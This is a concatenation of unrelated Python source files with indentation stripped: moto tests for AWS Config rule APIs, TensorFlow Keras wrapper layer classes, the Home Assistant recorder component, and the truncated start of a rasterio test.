client = boto3.client("config", region_name=TEST_REGION)
managed_rule = managed_config_rule()
managed_rule["Scope"]["TagValue"] = "tester"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"Tag key should not be empty when tag value is provided in scope"
in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["Scope"]["ComplianceResourceId"] = "12345"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"A single resourceType should be provided when resourceId is provided "
"in scope" in err["Message"]
)
managed_rule = managed_config_rule()
tag_key = "hellobye" * 16 + "x"
managed_rule["Scope"]["TagKey"] = tag_key
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "ValidationException"
assert (
f"Value '{tag_key}' at 'ConfigRule.Scope.TagKey' failed to satisfy "
f"constraint: Member must have length less than or equal to 128"
in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["Scope"]["TagKey"] = "test"
tag_value = "01234567890123456" * 16 + "x"
managed_rule["Scope"]["TagValue"] = tag_value
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "ValidationException"
assert (
f"Value '{tag_value}' at 'ConfigRule.Scope.TagValue' failed to "
f"satisfy constraint: Member must have length less than or equal to "
f"256" in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["Scope"]["TagKey"] = "test"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert "Scope cannot be applied to both resource and tag" in err["Message"]
managed_rule = managed_config_rule()
managed_rule["Scope"]["TagKey"] = "test_key"
managed_rule["Scope"]["ComplianceResourceTypes"] = []
managed_rule["Scope"]["ComplianceResourceId"] = "12345"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert "Scope cannot be applied to both resource and tag" in err["Message"]
@mock_config
def test_valid_put_config_managed_rule():
"""Test valid put_config_rule API calls for managed rules."""
client = boto3.client("config", region_name=TEST_REGION)
# Create managed rule and compare input against describe_config_rule()
# output.
managed_rule = managed_config_rule()
managed_rule["Source"]["SourceIdentifier"] = "IAM_PASSWORD_POLICY"
managed_rule["Scope"]["ComplianceResourceTypes"] = ["AWS::IAM::Group"]
managed_rule["Scope"]["ComplianceResourceId"] = "basic_test"
managed_rule["InputParameters"] = '{"RequireUppercaseCharacters":"true"}'
managed_rule["ConfigRuleState"] = "ACTIVE"
client.put_config_rule(ConfigRule=managed_rule)
rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
managed_rule_json = json.dumps(managed_rule, sort_keys=True)
new_config_rule = rsp["ConfigRules"][0]
rule_arn = new_config_rule.pop("ConfigRuleArn")
rule_id = new_config_rule.pop("ConfigRuleId")
rsp_json = json.dumps(new_config_rule, sort_keys=True)
assert managed_rule_json == rsp_json
# Update managed rule and compare again.
managed_rule["ConfigRuleArn"] = rule_arn
managed_rule["ConfigRuleId"] = rule_id
managed_rule["Description"] = "Updated Managed S3 Public Read Rule"
managed_rule["Scope"]["ComplianceResourceTypes"] = ["AWS::S3::Bucket"]
managed_rule["MaximumExecutionFrequency"] = "Six_Hours"
managed_rule["InputParameters"] = "{}"
client.put_config_rule(ConfigRule=managed_rule)
rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
managed_rule_json = json.dumps(managed_rule, sort_keys=True)
rsp_json = json.dumps(rsp["ConfigRules"][0], sort_keys=True)
assert managed_rule_json == rsp_json
# Valid InputParameters.
managed_rule = {
"ConfigRuleName": f"input_param_test_{random_string()}",
"Description": "Provide subset of allowed input parameters",
"InputParameters": '{"blockedPort1":"22","blockedPort2":"3389"}',
"Scope": {"ComplianceResourceTypes": ["AWS::IAM::SecurityGroup"]},
"Source": {"Owner": "AWS", "SourceIdentifier": "RESTRICTED_INCOMING_TRAFFIC"},
}
client.put_config_rule(ConfigRule=managed_rule)
rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
managed_rule_json = json.dumps(managed_rule, sort_keys=True)
new_config_rule = rsp["ConfigRules"][0]
del new_config_rule["ConfigRuleArn"]
del new_config_rule["ConfigRuleId"]
del new_config_rule["ConfigRuleState"]
rsp_json = json.dumps(new_config_rule, sort_keys=True)
assert managed_rule_json == rsp_json
@mock_config
def test_describe_config_rules():
"""Test the describe_config_rules API."""
client = boto3.client("config", region_name=TEST_REGION)
response = client.describe_config_rules()
assert len(response["ConfigRules"]) == 0
rule_name_base = "describe_test"
for idx in range(ConfigRule.MAX_RULES):
managed_rule = managed_config_rule()
managed_rule["ConfigRuleName"] = f"{rule_name_base}_{idx}"
client.put_config_rule(ConfigRule=managed_rule)
with pytest.raises(ClientError) as exc:
client.describe_config_rules(
ConfigRuleNames=[
f"{rule_name_base}_1",
f"{rule_name_base}_10",
"fooey",
f"{rule_name_base}_20",
]
)
err = exc.value.response["Error"]
assert err["Code"] == "NoSuchConfigRuleException"
assert "The ConfigRule 'fooey' provided in the request is invalid" in err["Message"]
# Request three specific ConfigRules.
response = client.describe_config_rules(
ConfigRuleNames=[
f"{rule_name_base}_1",
f"{rule_name_base}_10",
f"{rule_name_base}_20",
]
)
assert len(response["ConfigRules"]) == 3
# By default, if no ConfigRules are specified, all that can be fit on a
# "page" will be returned.
response = client.describe_config_rules()
assert len(response["ConfigRules"]) == CONFIG_RULE_PAGE_SIZE
# Test a bad token.
with pytest.raises(ClientError) as exc:
client.describe_config_rules(NextToken="foo")
err = exc.value.response["Error"]
assert err["Code"] == "InvalidNextTokenException"
assert "The nextToken provided is invalid" in err["Message"]
# Loop using tokens, verifying the tokens are as expected.
expected_tokens = [ # Non-alphanumeric sorted token numbers
f"{rule_name_base}_120",
f"{rule_name_base}_143",
f"{rule_name_base}_31",
f"{rule_name_base}_54",
f"{rule_name_base}_77",
None,
]
idx = 0
token = f"{rule_name_base}_0"
while token:
rsp = client.describe_config_rules(NextToken=token)
token = rsp.get("NextToken")
assert token == expected_tokens[idx]
idx += 1
@mock_config
def test_delete_config_rules():
"""Test the delete_config_rule API."""
client = boto3.client("config", region_name=TEST_REGION)
# Create a ConfigRule:
rule_name = "test_delete_config_rule"
managed_rule = managed_config_rule()
managed_rule["ConfigRuleName"] = rule_name
client.put_config_rule(ConfigRule=managed_rule)
# Delete it:
client.delete_config_rule(ConfigRuleName=rule_name)
# Verify that none are there:
assert not client.describe_config_rules()["ConfigRules"]
# Try it again -- it should error indicating the rule could not be found.
with pytest.raises(ClientError) as exc:
client.delete_config_rule(ConfigRuleName=rule_name)
err = exc.value.response["Error"]
assert err["Code"] == "NoSuchConfigRuleException"
assert (
f"The ConfigRule '{rule_name}' provided in the request is invalid"
in err["Message"]
)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Wrapper layers: layers that augment the functionality of another layer.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras._impl.keras import backend as K
from tensorflow.python.keras._impl.keras.engine import InputSpec
from tensorflow.python.keras._impl.keras.engine import Layer
from tensorflow.python.keras._impl.keras.engine.base_layer import shape_type_conversion
from tensorflow.python.keras._impl.keras.utils.generic_utils import has_arg
from tensorflow.python.layers import utils as tf_layers_util
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.layers.Wrapper')
class Wrapper(Layer):
"""Abstract wrapper base class.
Wrappers take another layer and augment it in various ways.
Do not use this class as a layer, it is only an abstract base class.
Two usable wrappers are the `TimeDistributed` and `Bidirectional` wrappers.
Arguments:
layer: The layer to be wrapped.
"""
def __init__(self, layer, **kwargs):
self.layer = layer
# Tracks mapping of Wrapper inputs to inner layer inputs. Useful when
# the inner layer has update ops that depend on its inputs (as opposed
# to the inputs to the Wrapper layer).
self._input_map = {}
super(Wrapper, self).__init__(**kwargs)
def build(self, input_shape=None):
self.built = True
@property
def activity_regularizer(self):
if hasattr(self.layer, 'activity_regularizer'):
return self.layer.activity_regularizer
else:
return None
@property
def trainable(self):
return self.layer.trainable
@trainable.setter
def trainable(self, value):
self.layer.trainable = value
@property
def trainable_weights(self):
return self.layer.trainable_weights
@property
def non_trainable_weights(self):
return self.layer.non_trainable_weights
@property
def updates(self):
return self.layer.updates + self._updates
@property
def losses(self):
return self.layer.losses + self._losses
def get_weights(self):
return self.layer.get_weights()
def set_weights(self, weights):
self.layer.set_weights(weights)
def get_config(self):
config = {
'layer': {
'class_name': self.layer.__class__.__name__,
'config': self.layer.get_config()
}
}
base_config = super(Wrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
from tensorflow.python.keras._impl.keras.layers import deserialize as deserialize_layer # pylint: disable=g-import-not-at-top
layer = deserialize_layer(
config.pop('layer'), custom_objects=custom_objects)
return cls(layer, **config)
@tf_export('keras.layers.TimeDistributed')
class TimeDistributed(Wrapper):
"""This wrapper allows to apply a layer to every temporal slice of an input.
The input should be at least 3D, and the dimension of index one
will be considered to be the temporal dimension.
Consider a batch of 32 samples,
where each sample is a sequence of 10 vectors of 16 dimensions.
The batch input shape of the layer is then `(32, 10, 16)`,
and the `input_shape`, not including the samples dimension, is `(10, 16)`.
You can then use `TimeDistributed` to apply a `Dense` layer
to each of the 10 timesteps, independently:
```python
# as the first layer in a model
model = Sequential()
model.add(TimeDistributed(Dense(8), input_shape=(10, 16)))
# now model.output_shape == (None, 10, 8)
```
The output will then have shape `(32, 10, 8)`.
In subsequent layers, there is no need for the `input_shape`:
```python
model.add(TimeDistributed(Dense(32)))
# now model.output_shape == (None, 10, 32)
```
The output will then have shape `(32, 10, 32)`.
`TimeDistributed` can be used with arbitrary layers, not just `Dense`,
for instance with a `Conv2D` layer:
```python
model = Sequential()
model.add(TimeDistributed(Conv2D(64, (3, 3)),
input_shape=(10, 299, 299, 3)))
```
Arguments:
layer: a layer instance.
"""
def __init__(self, layer, **kwargs):
super(TimeDistributed, self).__init__(layer, **kwargs)
self.supports_masking = True
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
assert len(input_shape) >= 3
self.input_spec = InputSpec(shape=input_shape)
child_input_shape = [input_shape[0]] + input_shape[2:]
if not self.layer.built:
self.layer.build(child_input_shape)
self.layer.built = True
super(TimeDistributed, self).build()
self.built = True
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
child_input_shape = tensor_shape.TensorShape([input_shape[0]] +
input_shape[2:])
child_output_shape = self.layer.compute_output_shape(
child_input_shape).as_list()
timesteps = input_shape[1]
return tensor_shape.TensorShape([child_output_shape[0], timesteps] +
child_output_shape[1:])
def call(self, inputs, training=None, mask=None):
kwargs = {}
if has_arg(self.layer.call, 'training'):
kwargs['training'] = training
uses_learning_phase = False # pylint: disable=redefined-outer-name
input_shape = K.int_shape(inputs)
if input_shape[0]:
# batch size matters, use rnn-based implementation
def step(x, _):
global uses_learning_phase # pylint: disable=global-variable-undefined
output = self.layer.call(x, **kwargs)
if hasattr(output, '_uses_learning_phase'):
uses_learning_phase = (output._uses_learning_phase or
uses_learning_phase)
return output, []
_, outputs, _ = K.rnn(
step,
inputs,
initial_states=[],
unroll=False)
y = outputs
else:
# No batch size specified, therefore the layer will be able
# to process batches of any size.
# We can go with reshape-based implementation for performance.
input_length = input_shape[1]
if not input_length:
input_length = K.shape(inputs)[1]
# Shape: (num_samples * timesteps, ...). And track the
# transformation in self._input_map.
input_uid = tf_layers_util.object_list_uid(inputs)
inputs = K.reshape(inputs, (-1,) + input_shape[2:])
self._input_map[input_uid] = inputs
# (num_samples * timesteps, ...)
y = self.layer.call(inputs, **kwargs)
if hasattr(y, '_uses_learning_phase'):
uses_learning_phase = y._uses_learning_phase
# Shape: (num_samples, timesteps, ...)
output_shape = self.compute_output_shape(input_shape).as_list()
y = K.reshape(y, (-1, input_length) + tuple(output_shape[2:]))
# Apply activity regularizer if any:
if (hasattr(self.layer, 'activity_regularizer') and
self.layer.activity_regularizer is not None):
regularization_loss = self.layer.activity_regularizer(y)
self.add_loss(regularization_loss, inputs)
if uses_learning_phase:
y._uses_learning_phase = True
return y
@tf_export('keras.layers.Bidirectional')
class Bidirectional(Wrapper):
"""Bidirectional wrapper for RNNs.
Arguments:
layer: `Recurrent` instance.
merge_mode: Mode by which outputs of the
forward and backward RNNs will be combined.
One of {'sum', 'mul', 'concat', 'ave', None}.
If None, the outputs will not be combined,
they will be returned as a list.
Raises:
ValueError: In case of invalid `merge_mode` argument.
Examples:
```python
model = Sequential()
model.add(Bidirectional(LSTM(10, return_sequences=True), input_shape=(5,
10)))
model.add(Bidirectional(LSTM(10)))
model.add(Dense(5))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
```
"""
def __init__(self, layer, merge_mode='concat', weights=None, **kwargs):
if merge_mode not in ['sum', 'mul', 'ave', 'concat', None]:
raise ValueError('Invalid merge mode. '
'Merge mode should be one of '
'{"sum", "mul", "ave", "concat", None}')
self.forward_layer = copy.copy(layer)
config = layer.get_config()
config['go_backwards'] = not config['go_backwards']
self.backward_layer = layer.__class__.from_config(config)
self.forward_layer._name = 'forward_' + self.forward_layer.name
self.backward_layer._name = 'backward_' + self.backward_layer.name
self.merge_mode = merge_mode
if weights:
nw = len(weights)
self.forward_layer.initial_weights = weights[:nw // 2]
self.backward_layer.initial_weights = weights[nw // 2:]
self.stateful = layer.stateful
self.return_sequences = layer.return_sequences
self.return_state = layer.return_state
self.supports_masking = True
self._trainable = True
super(Bidirectional, self).__init__(layer, **kwargs)
self.input_spec = layer.input_spec
@property
def trainable(self):
return self._trainable
@trainable.setter
def trainable(self, value):
self._trainable = value
self.forward_layer.trainable = value
self.backward_layer.trainable = value
def get_weights(self):
return self.forward_layer.get_weights() + self.backward_layer.get_weights()
def set_weights(self, weights):
nw = len(weights)
self.forward_layer.set_weights(weights[:nw // 2])
self.backward_layer.set_weights(weights[nw // 2:])
@shape_type_conversion
def compute_output_shape(self, input_shape):
output_shape = tuple(self.forward_layer.compute_output_shape(
input_shape).as_list())
if self.return_state:
state_shape = output_shape[1:]
output_shape = output_shape[0]
if self.merge_mode == 'concat':
output_shape = list(output_shape)
output_shape[-1] *= 2
output_shape = tuple(output_shape)
elif self.merge_mode is None:
output_shape = [output_shape, copy.copy(output_shape)]
if self.return_state:
if self.merge_mode is None:
return output_shape + state_shape + copy.copy(state_shape)
return [output_shape] + state_shape + copy.copy(state_shape)
return output_shape
def __call__(self, inputs, initial_state=None, **kwargs):
if isinstance(inputs, list):
if len(inputs) > 1:
initial_state = inputs[1:]
inputs = inputs[0]
if initial_state is None:
return super(Bidirectional, self).__call__(inputs, **kwargs)
# Standardize `initial_state` into list
if isinstance(initial_state, tuple):
initial_state = list(initial_state)
elif not isinstance(initial_state, list):
initial_state = [initial_state]
# Check if `initial_state` can be splitted into half
num_states = len(initial_state)
if num_states % 2 > 0:
raise ValueError(
'When passing `initial_state` to a Bidirectional RNN, the state '
'should be a list containing the states of the underlying RNNs. '
'Found: ' + str(initial_state))
# Applies the same workaround as in `RNN.__call__`, without handling
# constants
kwargs['initial_state'] = initial_state
additional_inputs = initial_state
additional_specs = [InputSpec(shape=K.int_shape(state))
for state in initial_state]
self.forward_layer.state_spec = additional_specs[:num_states // 2]
self.backward_layer.state_spec = additional_specs[num_states // 2:]
is_keras_tensor = K.is_keras_tensor(additional_inputs[0])
for tensor in additional_inputs:
if K.is_keras_tensor(tensor) != is_keras_tensor:
raise ValueError('The initial state of a Bidirectional'
' layer cannot be specified with a mix of'
' Keras tensors and non-Keras tensors'
' (a "Keras tensor" is a tensor that was'
' returned by a Keras layer, or by `Input`)')
if is_keras_tensor:
# Compute the full input spec, including state
full_input = [inputs] + additional_inputs
full_input_spec = self.input_spec + additional_specs
# Perform the call with temporarily replaced input_spec
original_input_spec = self.input_spec
self.input_spec = full_input_spec
output = super(Bidirectional, self).__call__(full_input, **kwargs)
self.input_spec = original_input_spec
return output
else:
return super(Bidirectional, self).__call__(inputs, **kwargs)
def call(self, inputs, training=None, mask=None, initial_state=None):
kwargs = {}
if has_arg(self.layer.call, 'training'):
kwargs['training'] = training
if has_arg(self.layer.call, 'mask'):
kwargs['mask'] = mask
if initial_state is not None and has_arg(self.layer.call, 'initial_state'):
forward_state = initial_state[:len(initial_state) // 2]
backward_state = initial_state[len(initial_state) // 2:]
y = self.forward_layer.call(inputs, initial_state=forward_state, **kwargs)
y_rev = self.backward_layer.call(
inputs, initial_state=backward_state, **kwargs)
else:
y = self.forward_layer.call(inputs, **kwargs)
y_rev = self.backward_layer.call(inputs, **kwargs)
if self.return_state:
states = y[1:] + y_rev[1:]
y = y[0]
y_rev = y_rev[0]
if self.return_sequences:
y_rev = K.reverse(y_rev, 1)
if self.merge_mode == 'concat':
output = K.concatenate([y, y_rev])
elif self.merge_mode == 'sum':
output = y + y_rev
elif self.merge_mode == 'ave':
output = (y + y_rev) / 2
elif self.merge_mode == 'mul':
output = y * y_rev
elif self.merge_mode is None:
output = [y, y_rev]
# Properly set learning phase
if (getattr(y, '_uses_learning_phase', False) or
getattr(y_rev, '_uses_learning_phase', False)):
if self.merge_mode is None:
for out in output:
out._uses_learning_phase = True
else:
output._uses_learning_phase = True
if self.return_state:
if self.merge_mode is None:
return output + states
return [output] + states
return output
def reset_states(self):
self.forward_layer.reset_states()
self.backward_layer.reset_states()
def build(self, input_shape):
with K.name_scope(self.forward_layer.name):
self.forward_layer.build(input_shape)
with K.name_scope(self.backward_layer.name):
self.backward_layer.build(input_shape)
self.built = True
def compute_mask(self, inputs, mask):
if self.return_sequences:
if not self.merge_mode:
return [mask, mask]
else:
return mask
else:
return None
@property
def trainable_weights(self):
if hasattr(self.forward_layer, 'trainable_weights'):
return (self.forward_layer.trainable_weights +
self.backward_layer.trainable_weights)
return []
@property
def non_trainable_weights(self):
if hasattr(self.forward_layer, 'non_trainable_weights'):
return (self.forward_layer.non_trainable_weights +
self.backward_layer.non_trainable_weights)
return []
@property
def updates(self):
if hasattr(self.forward_layer, 'updates'):
return self.forward_layer.updates + self.backward_layer.updates
return []
@property
def losses(self):
if hasattr(self.forward_layer, 'losses'):
return self.forward_layer.losses + self.backward_layer.losses
return []
@property
def constraints(self):
constraints = {}
if hasattr(self.forward_layer, 'constraints'):
constraints.update(self.forward_layer.constraints)
constraints.update(self.backward_layer.constraints)
return constraints
def get_config(self):
config = {'merge_mode': self.merge_mode}
base_config = super(Bidirectional, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
| |
"""Support for recording details."""
import asyncio
from collections import namedtuple
import concurrent.futures
from datetime import datetime, timedelta
import logging
import queue
import threading
import time
from typing import Any, Dict, Optional # noqa: F401
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_DOMAINS, CONF_ENTITIES, CONF_EXCLUDE, CONF_INCLUDE,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, MATCH_ALL)
from homeassistant.core import CoreState, HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import generate_filter
from homeassistant.helpers.typing import ConfigType
import homeassistant.util.dt as dt_util
from . import migration, purge
from .const import DATA_INSTANCE
from .util import session_scope
REQUIREMENTS = ['sqlalchemy==1.2.18']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'recorder'
SERVICE_PURGE = 'purge'
ATTR_KEEP_DAYS = 'keep_days'
ATTR_REPACK = 'repack'
SERVICE_PURGE_SCHEMA = vol.Schema({
vol.Optional(ATTR_KEEP_DAYS): vol.All(vol.Coerce(int), vol.Range(min=0)),
vol.Optional(ATTR_REPACK, default=False): cv.boolean,
})
DEFAULT_URL = 'sqlite:///{hass_config_path}'
DEFAULT_DB_FILE = 'home-assistant_v2.db'
CONF_DB_URL = 'db_url'
CONF_PURGE_KEEP_DAYS = 'purge_keep_days'
CONF_PURGE_INTERVAL = 'purge_interval'
CONF_EVENT_TYPES = 'event_types'
CONNECT_RETRY_WAIT = 3
FILTER_SCHEMA = vol.Schema({
vol.Optional(CONF_EXCLUDE, default={}): vol.Schema({
vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ENTITIES): cv.entity_ids,
vol.Optional(CONF_EVENT_TYPES): vol.All(cv.ensure_list, [cv.string]),
}),
vol.Optional(CONF_INCLUDE, default={}): vol.Schema({
vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ENTITIES): cv.entity_ids,
})
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: FILTER_SCHEMA.extend({
vol.Optional(CONF_PURGE_KEEP_DAYS, default=10):
vol.All(vol.Coerce(int), vol.Range(min=1)),
vol.Optional(CONF_PURGE_INTERVAL, default=1):
vol.All(vol.Coerce(int), vol.Range(min=0)),
vol.Optional(CONF_DB_URL): cv.string,
})
}, extra=vol.ALLOW_EXTRA)
def run_information(hass, point_in_time: Optional[datetime] = None):
"""Return information about current run.
There is also the run that covers point_in_time.
"""
from . import models
ins = hass.data[DATA_INSTANCE]
recorder_runs = models.RecorderRuns
if point_in_time is None or point_in_time > ins.recording_start:
return ins.run_info
with session_scope(hass=hass) as session:
res = session.query(recorder_runs).filter(
(recorder_runs.start < point_in_time) &
(recorder_runs.end > point_in_time)).first()
if res:
session.expunge(res)
return res
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the recorder."""
conf = config.get(DOMAIN, {})
keep_days = conf.get(CONF_PURGE_KEEP_DAYS)
purge_interval = conf.get(CONF_PURGE_INTERVAL)
db_url = conf.get(CONF_DB_URL, None)
if not db_url:
db_url = DEFAULT_URL.format(
hass_config_path=hass.config.path(DEFAULT_DB_FILE))
include = conf.get(CONF_INCLUDE, {})
exclude = conf.get(CONF_EXCLUDE, {})
instance = hass.data[DATA_INSTANCE] = Recorder(
hass=hass, keep_days=keep_days, purge_interval=purge_interval,
uri=db_url, include=include, exclude=exclude)
instance.async_initialize()
instance.start()
async def async_handle_purge_service(service):
"""Handle calls to the purge service."""
instance.do_adhoc_purge(**service.data)
hass.services.async_register(
DOMAIN, SERVICE_PURGE, async_handle_purge_service,
schema=SERVICE_PURGE_SCHEMA)
return await instance.async_db_ready
PurgeTask = namedtuple('PurgeTask', ['keep_days', 'repack'])
class Recorder(threading.Thread):
"""A threaded recorder class."""
def __init__(self, hass: HomeAssistant, keep_days: int,
purge_interval: int, uri: str,
include: Dict, exclude: Dict) -> None:
"""Initialize the recorder."""
threading.Thread.__init__(self, name='Recorder')
self.hass = hass
self.keep_days = keep_days
self.purge_interval = purge_interval
self.queue = queue.Queue() # type: Any
self.recording_start = dt_util.utcnow()
self.db_url = uri
self.async_db_ready = asyncio.Future(loop=hass.loop)
self.engine = None # type: Any
self.run_info = None # type: Any
self.entity_filter = generate_filter(
include.get(CONF_DOMAINS, []), include.get(CONF_ENTITIES, []),
exclude.get(CONF_DOMAINS, []), exclude.get(CONF_ENTITIES, []))
self.exclude_t = exclude.get(CONF_EVENT_TYPES, [])
self.get_session = None
@callback
def async_initialize(self):
"""Initialize the recorder."""
self.hass.bus.async_listen(MATCH_ALL, self.event_listener)
def do_adhoc_purge(self, **kwargs):
"""Trigger an adhoc purge retaining keep_days worth of data."""
keep_days = kwargs.get(ATTR_KEEP_DAYS, self.keep_days)
repack = kwargs.get(ATTR_REPACK)
self.queue.put(PurgeTask(keep_days, repack))
def run(self):
"""Start processing events to save."""
from .models import States, Events
from homeassistant.components import persistent_notification
from sqlalchemy import exc
tries = 1
connected = False
while not connected and tries <= 10:
if tries != 1:
time.sleep(CONNECT_RETRY_WAIT)
try:
self._setup_connection()
migration.migrate_schema(self)
self._setup_run()
connected = True
_LOGGER.debug("Connected to recorder database")
except Exception as err: # pylint: disable=broad-except
_LOGGER.error("Error during connection setup: %s (retrying "
"in %s seconds)", err, CONNECT_RETRY_WAIT)
tries += 1
if not connected:
@callback
def connection_failed():
"""Connect failed tasks."""
self.async_db_ready.set_result(False)
persistent_notification.async_create(
self.hass,
"The recorder could not start, please check the log",
"Recorder")
self.hass.add_job(connection_failed)
return
shutdown_task = object()
hass_started = concurrent.futures.Future()
@callback
def register():
"""Post connection initialize."""
self.async_db_ready.set_result(True)
def shutdown(event):
"""Shut down the Recorder."""
if not hass_started.done():
hass_started.set_result(shutdown_task)
self.queue.put(None)
self.join()
self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)
if self.hass.state == CoreState.running:
hass_started.set_result(None)
else:
@callback
def notify_hass_started(event):
"""Notify that hass has started."""
hass_started.set_result(None)
self.hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_START, notify_hass_started)
self.hass.add_job(register)
result = hass_started.result()
# If shutdown happened before Home Assistant finished starting
if result is shutdown_task:
return
# Start periodic purge
if self.keep_days and self.purge_interval:
@callback
def async_purge(now):
"""Trigger the purge and schedule the next run."""
self.queue.put(
PurgeTask(self.keep_days, repack=False))
self.hass.helpers.event.async_track_point_in_time(
async_purge, now + timedelta(days=self.purge_interval))
earliest = dt_util.utcnow() + timedelta(minutes=30)
run = latest = dt_util.utcnow() + \
timedelta(days=self.purge_interval)
with session_scope(session=self.get_session()) as session:
event = session.query(Events).first()
if event is not None:
session.expunge(event)
run = dt_util.as_utc(event.time_fired) + timedelta(
days=self.keep_days+self.purge_interval)
run = min(latest, max(run, earliest))
self.hass.helpers.event.track_point_in_time(async_purge, run)
while True:
event = self.queue.get()
if event is None:
self._close_run()
self._close_connection()
self.queue.task_done()
return
if isinstance(event, PurgeTask):
purge.purge_old_data(self, event.keep_days, event.repack)
self.queue.task_done()
continue
elif event.event_type == EVENT_TIME_CHANGED:
self.queue.task_done()
continue
elif event.event_type in self.exclude_t:
self.queue.task_done()
continue
entity_id = event.data.get(ATTR_ENTITY_ID)
if entity_id is not None:
if not self.entity_filter(entity_id):
self.queue.task_done()
continue
tries = 1
updated = False
while not updated and tries <= 10:
if tries != 1:
time.sleep(CONNECT_RETRY_WAIT)
try:
with session_scope(session=self.get_session()) as session:
try:
dbevent = Events.from_event(event)
session.add(dbevent)
session.flush()
except (TypeError, ValueError):
_LOGGER.warning(
"Event is not JSON serializable: %s", event)
if event.event_type == EVENT_STATE_CHANGED:
try:
dbstate = States.from_event(event)
dbstate.event_id = dbevent.event_id
session.add(dbstate)
except (TypeError, ValueError):
_LOGGER.warning(
"State is not JSON serializable: %s",
event.data.get('new_state'))
updated = True
except exc.OperationalError as err:
_LOGGER.error("Error in database connectivity: %s. "
"(retrying in %s seconds)", err,
CONNECT_RETRY_WAIT)
tries += 1
if not updated:
_LOGGER.error("Error in database update. Could not save "
"after %d tries. Giving up", tries)
self.queue.task_done()
@callback
def event_listener(self, event):
"""Listen for new events and put them in the process queue."""
self.queue.put(event)
def block_till_done(self):
"""Block till all events processed."""
self.queue.join()
def _setup_connection(self):
"""Ensure database is ready to fly."""
from sqlalchemy import create_engine, event
from sqlalchemy.engine import Engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
from sqlite3 import Connection
from . import models
kwargs = {}
# pylint: disable=unused-variable
@event.listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
"""Set sqlite's WAL mode."""
if isinstance(dbapi_connection, Connection):
old_isolation = dbapi_connection.isolation_level
dbapi_connection.isolation_level = None
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA journal_mode=WAL")
cursor.close()
dbapi_connection.isolation_level = old_isolation
if self.db_url == 'sqlite://' or ':memory:' in self.db_url:
from sqlalchemy.pool import StaticPool
kwargs['connect_args'] = {'check_same_thread': False}
kwargs['poolclass'] = StaticPool
kwargs['pool_reset_on_return'] = None
else:
kwargs['echo'] = False
if self.engine is not None:
self.engine.dispose()
self.engine = create_engine(self.db_url, **kwargs)
models.Base.metadata.create_all(self.engine)
self.get_session = scoped_session(sessionmaker(bind=self.engine))
def _close_connection(self):
"""Close the connection."""
self.engine.dispose()
self.engine = None
self.get_session = None
def _setup_run(self):
"""Log the start of the current run."""
from .models import RecorderRuns
with session_scope(session=self.get_session()) as session:
for run in session.query(RecorderRuns).filter_by(end=None):
run.closed_incorrect = True
run.end = self.recording_start
_LOGGER.warning("Ended unfinished session (id=%s from %s)",
run.run_id, run.start)
session.add(run)
self.run_info = RecorderRuns(
start=self.recording_start,
created=dt_util.utcnow()
)
session.add(self.run_info)
session.flush()
session.expunge(self.run_info)
def _close_run(self):
"""Save end time for current run."""
with session_scope(session=self.get_session()) as session:
self.run_info.end = dt_util.utcnow()
session.add(self.run_info)
self.run_info = None
| |
import logging
import sys
import unittest
import numpy
from hashlib import md5
import rasterio
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
class ReaderContextTest(unittest.TestCase):
def test_context(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
